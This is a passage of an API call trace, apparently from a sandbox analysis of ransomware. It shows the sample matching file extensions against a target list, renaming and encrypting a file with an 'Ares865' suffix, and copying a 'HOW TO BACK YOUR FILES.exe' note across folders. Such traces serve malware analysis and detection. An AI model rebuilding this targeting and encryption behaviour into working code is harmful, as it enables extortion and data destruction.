(lpString1="GRL", lpString2="odb") returned -1 [0089.090] lstrlenW (lpString="odb") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="odb") returned -1 [0089.090] lstrlenW (lpString="oqy") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="oqy") returned -1 [0089.090] lstrlenW (lpString="ora") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="ora") returned -1 [0089.090] lstrlenW (lpString="orx") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="orx") returned -1 [0089.090] lstrlenW (lpString="owc") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="owc") returned -1 [0089.091] lstrlenW (lpString="p96") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="p96") returned -1 [0089.091] lstrlenW (lpString="p97") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="p97") returned -1 [0089.091] lstrlenW (lpString="pan") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="pan") returned -1 [0089.091] lstrlenW (lpString="pdb") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="pdb") returned -1 [0089.091] lstrlenW (lpString="pdm") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="pdm") returned -1 [0089.091] lstrlenW (lpString="pnz") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="pnz") returned -1 [0089.091] lstrlenW (lpString="qry") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="qry") returned -1 [0089.091] lstrlenW (lpString="qvd") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="qvd") returned -1 [0089.091] lstrlenW (lpString="rbf") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="rbf") returned -1 [0089.091] lstrlenW (lpString="rctd") returned 4 [0089.091] lstrcmpiW (lpString1=".GRL", lpString2="rctd") returned -1 [0089.091] lstrlenW (lpString="rod") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="rod") returned -1 [0089.091] lstrlenW (lpString="rodx") returned 4 [0089.091] lstrcmpiW (lpString1=".GRL", lpString2="rodx") returned -1 [0089.091] lstrlenW (lpString="rpd") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="rpd") returned -1 [0089.091] lstrlenW (lpString="rsd") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="rsd") returned -1 [0089.091] lstrlenW (lpString="sas7bdat") returned 8 [0089.091] lstrcmpiW (lpString1="ding.GRL", lpString2="sas7bdat") returned -1 [0089.091] lstrlenW (lpString="sbf") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="sbf") returned -1 [0089.091] lstrlenW (lpString="scx") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="scx") returned -1 [0089.091] lstrlenW (lpString="sdb") returned 3 [0089.091] lstrcmpiW (lpString1="GRL", lpString2="sdb") returned -1 [0089.091] lstrlenW (lpString="sdc") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="sdc") returned -1 [0089.092] lstrlenW (lpString="sdf") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="sdf") returned -1 [0089.092] lstrlenW (lpString="sis") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="sis") returned -1 [0089.092] lstrlenW (lpString="spq") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="spq") returned -1 [0089.092] lstrlenW (lpString="te") returned 2 [0089.092] lstrcmpiW (lpString1="RL", lpString2="te") returned -1 [0089.092] lstrlenW (lpString="teacher") returned 7 [0089.092] lstrcmpiW (lpString1="ing.GRL", lpString2="teacher") returned -1 [0089.092] lstrlenW (lpString="tmd") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="tmd") returned -1 [0089.092] lstrlenW (lpString="tps") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="tps") returned -1 [0089.092] lstrlenW (lpString="trc") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="trc") returned -1 [0089.092] lstrlenW (lpString="trc") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="trc") returned -1 [0089.092] lstrlenW (lpString="trm") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="trm") returned -1 [0089.092] lstrlenW (lpString="udb") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="udb") returned -1 [0089.092] lstrlenW (lpString="udl") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="udl") returned -1 [0089.092] lstrlenW (lpString="usr") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="usr") returned -1 [0089.092] lstrlenW (lpString="v12") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="v12") returned -1 [0089.092] lstrlenW (lpString="vis") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="vis") returned -1 [0089.092] lstrlenW (lpString="vpd") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="vpd") returned -1 [0089.092] lstrlenW (lpString="vvv") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="vvv") returned -1 [0089.092] lstrlenW (lpString="wdb") returned 3 [0089.092] lstrcmpiW (lpString1="GRL", lpString2="wdb") returned -1 [0089.092] lstrlenW (lpString="wmdb") returned 4 [0089.093] lstrcmpiW (lpString1=".GRL", lpString2="wmdb") returned -1 [0089.093] lstrlenW (lpString="wrk") returned 3 [0089.093] lstrcmpiW (lpString1="GRL", lpString2="wrk") returned -1 [0089.093] lstrlenW (lpString="xdb") returned 3 [0089.093] lstrcmpiW (lpString1="GRL", lpString2="xdb") returned -1 [0089.093] lstrlenW (lpString="xld") returned 3 [0089.093] lstrcmpiW (lpString1="GRL", lpString2="xld") returned -1 [0089.093] lstrlenW (lpString="xmlff") returned 5 [0089.093] lstrcmpiW (lpString1="g.GRL", lpString2="xmlff") returned -1 [0089.093] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.Ares865") returned 51 [0089.093] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.Ares865" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl.ares865"), dwFlags=0x1) returned 1 [0089.095] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.Ares865" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.096] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14972) returned 1 [0089.096] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.096] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.096] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.096] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.097] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.097] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.097] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d80, lpName=0x0) returned 0x15c [0089.098] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d80) returned 0x190000 [0089.100] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.100] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.100] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.100] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.100] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.101] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.101] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.101] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.101] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.101] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.101] CloseHandle (hObject=0x15c) returned 1 [0089.101] CloseHandle (hObject=0x118) returned 1 [0089.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.101] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.102] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 0 [0089.102] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.102] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0089.102] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Media Player") returned="C:\\Users\\All Users\\Microsoft\\Media Player" [0089.102] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df830 | out: hHeap=0x2b0000) returned 1 [0089.102] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0089.102] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Media Player") returned 41 [0089.102] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Media Player") returned="C:\\Users\\All Users\\Microsoft\\Media Player" [0089.102] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.102] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.102] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.103] GetLastError () returned 0x0 [0089.103] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.103] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.103] CloseHandle (hObject=0x120) returned 1 [0089.103] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.103] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.103] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.103] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.103] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.103] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.103] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c65bbc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.103] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.103] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.103] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.103] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.103] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c65bbc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.103] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.103] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c65bbc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.103] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.104] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0089.104] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL" [0089.104] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df7d0 | out: hHeap=0x2b0000) returned 1 [0089.104] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0089.104] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned 40 [0089.104] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL" [0089.104] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.104] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.104] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.104] GetLastError () returned 0x0 [0089.104] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.105] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.105] CloseHandle (hObject=0x120) returned 1 [0089.105] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.105] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.105] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c6a7e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6a7e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.105] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.105] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.105] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.105] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd98f9f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c6a7e80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6a7e80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.105] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.105] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.105] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.105] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.105] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c65bbc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.105] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.105] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd591378b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd591378b, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac29de1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ppcrlconfig.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="aoldtz.exe") returned 1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2=".") returned 1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="..") returned 1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="windows") returned -1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="bootmgr") returned 1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="temp") returned -1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="pagefile.sys") returned 1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="boot") returned 1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="ids.txt") returned 1 [0089.105] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="ntuser.dat") returned 1 [0089.106] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="perflogs") returned 1 [0089.106] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2="MSBuild") returned 1 [0089.106] lstrlenW (lpString="ppcrlconfig.dll") returned 15 [0089.106] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\*") returned 42 [0089.106] lstrcpyW (in: lpString1=0x2cce452, lpString2="ppcrlconfig.dll" | out: lpString1="ppcrlconfig.dll") returned="ppcrlconfig.dll" [0089.106] lstrlenW (lpString="ppcrlconfig.dll") returned 15 [0089.106] lstrlenW (lpString="Ares865") returned 7 [0089.106] lstrcmpiW (lpString1="fig.dll", lpString2="Ares865") returned 1 [0089.106] lstrlenW (lpString=".dll") returned 4 [0089.106] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2=".dll") returned 1 [0089.106] lstrlenW (lpString=".lnk") returned 4 [0089.106] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2=".lnk") returned 1 [0089.106] lstrlenW (lpString=".ini") returned 4 [0089.106] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2=".ini") returned 1 [0089.106] lstrlenW (lpString=".sys") returned 4 [0089.106] lstrcmpiW (lpString1="ppcrlconfig.dll", lpString2=".sys") returned 1 [0089.106] lstrlenW (lpString="ppcrlconfig.dll") returned 15 [0089.106] lstrlenW (lpString="bak") returned 3 [0089.106] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0089.106] lstrlenW (lpString="ba_") returned 3 [0089.106] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0089.106] lstrlenW (lpString="dbb") returned 3 [0089.106] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0089.106] lstrlenW (lpString="vmdk") returned 4 [0089.106] lstrcmpiW (lpString1=".dll", lpString2="vmdk") returned -1 [0089.106] lstrlenW (lpString="rar") returned 3 [0089.106] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0089.106] lstrlenW (lpString="zip") returned 3 [0089.106] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0089.106] lstrlenW (lpString="tgz") returned 3 [0089.106] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0089.106] lstrlenW (lpString="vbox") returned 4 [0089.106] lstrcmpiW (lpString1=".dll", lpString2="vbox") returned -1 [0089.106] lstrlenW (lpString="vdi") returned 3 [0089.106] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0089.106] lstrlenW (lpString="vhd") returned 3 [0089.106] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0089.107] lstrlenW (lpString="vhdx") returned 4 [0089.107] lstrcmpiW (lpString1=".dll", lpString2="vhdx") returned -1 [0089.107] lstrlenW (lpString="avhd") returned 4 [0089.107] lstrcmpiW (lpString1=".dll", lpString2="avhd") returned -1 [0089.107] lstrlenW (lpString="db") returned 2 [0089.107] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0089.107] lstrlenW (lpString="db2") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0089.107] lstrlenW (lpString="db3") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0089.107] lstrlenW (lpString="dbf") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0089.107] lstrlenW (lpString="mdf") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0089.107] lstrlenW (lpString="mdb") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0089.107] lstrlenW (lpString="sql") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0089.107] lstrlenW (lpString="sqlite") returned 6 [0089.107] lstrcmpiW (lpString1="ig.dll", lpString2="sqlite") returned -1 [0089.107] lstrlenW (lpString="sqlite3") returned 7 [0089.107] lstrcmpiW (lpString1="fig.dll", lpString2="sqlite3") returned -1 [0089.107] lstrlenW (lpString="sqlitedb") returned 8 [0089.107] lstrcmpiW (lpString1="nfig.dll", lpString2="sqlitedb") returned -1 [0089.107] lstrlenW (lpString="xml") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0089.107] lstrlenW (lpString="$er") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0089.107] lstrlenW (lpString="4dd") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0089.107] lstrlenW (lpString="4dl") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0089.107] lstrlenW (lpString="^^^") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0089.107] lstrlenW (lpString="abs") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0089.107] lstrlenW (lpString="abx") returned 3 [0089.107] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0089.108] lstrlenW (lpString="accdb") returned 5 [0089.108] lstrcmpiW (lpString1="g.dll", lpString2="accdb") returned 1 [0089.108] lstrlenW (lpString="accdc") returned 5 [0089.108] lstrcmpiW (lpString1="g.dll", lpString2="accdc") returned 1 [0089.108] lstrlenW (lpString="accde") returned 5 [0089.108] lstrcmpiW 